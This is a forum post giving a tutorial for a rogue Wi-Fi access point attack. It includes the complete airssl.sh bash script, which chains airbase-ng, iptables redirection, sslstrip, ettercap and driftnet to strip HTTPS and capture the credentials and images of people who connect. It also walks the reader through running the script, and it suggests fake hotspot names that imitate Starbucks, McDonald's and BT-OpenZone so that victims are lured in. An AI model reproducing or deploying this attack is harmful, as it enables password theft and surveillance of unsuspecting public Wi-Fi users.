MARATHI TEAM
Welcome on the Marathi Team Forum.
To take full advantage of everything offered by
our forum, please log in if you are already a
member or join our community if you're not
yet....
Log in

I forgot my password

Top posting users this week

Nimbuzz id Maker
freebuzz is my love :D

user name

password

captcha


[Leaked] Learn How to setup a fake wireless access point {Hot}

View previous topic View next topic Go down

Heart [Leaked] Learn How to setup a fake wireless access point {Hot}

Post  slowdeath on Sun Jan 06, 2013 4:20 am

So In this thread i will teach you how to setup a fake wireless access point to capture passwords! so lets begin!
first of all you will need a script called airssl.sh and atleast 1 wireless network interface card!
so right click on your dekstop on BC5 and click create new document > empty file and name is airssl.sh
then paste the following code in it and save it now close it.

Code:
#!/bin/bash
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

once you have done that right click it and enter into the properties and enter these settings :



now open terminal and type /root/Desktop/airssl.sh you should get this :



for me i get :

0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0
0.0.0.0 192.168.0.1 0.0.0.0 UG 100 0 0 wlan
so i would enter 192.168.0.1 and press enter :
it will now ask you this :

Enter your interface that is connected to the internet, this should be listed above. For example eth1:
so my is wlan0 and wlan meaning im on a wireless network, so enter what is listed above
so now it will ask you to enter this :

Enter your interface to be used for the fake AP, for example wlan0:
so again i hav to enter wlan0 however if your unsure you can open up a seperate terminal and type :

airmon-ng
so as you can see i get wlan0 again so i will enter that.
it now asks you to enter the ESSID to be used for your rouge AP, this is basically the name that you see of a access point, in the UK we have something called BT-OPENZONE, which is aload of free wireless networks in the public so i would call it something along the lines of : BT-OpenZone453 however you could call it :
MacDonalds Registered Hotspot
Starbucks Public Wifi
Terminal X
etc... Note that your name can have spaces in it.
now press enter and our next question is displayed :


Code:
Quote: Wrote:
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A


for this tutorial we will keep to the basics and say n
it will continue to execute the commands and then pop up with another question :


Code:
Quote: Wrote:
Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N

again to keep it basic enter N and continue
One final question is next and it asks you :

Code:
Quote: Wrote:
Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower)
Y or N

here is where you decide what to do, if you press Y then obviously images of the victims connected to the network will be saved to : /pentest/wireless/airssl/driftftnetdata, this is obviously a bonus but will slow the network down!
ok so now press enter and if you set it up right you should see this screen :




now using a different PC or a VM scan for networks and connect to your fake AP, now lookup a site that uses SSL for their login, and simply register and login! the passwords will be displayed in ettercaps xterm shell in plain text!


I hope you enjoyed this tutorial i got the script and tutorial basis from here also its not copypasta
avatar
slowdeath
Owner
Owner

Posts : 216
Points : 591
Reputation : 0
Join date : 2012-12-03
Age : 24
Location : delhi

View user profile http://nimbuzz-team-coder.forumotion.org

Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum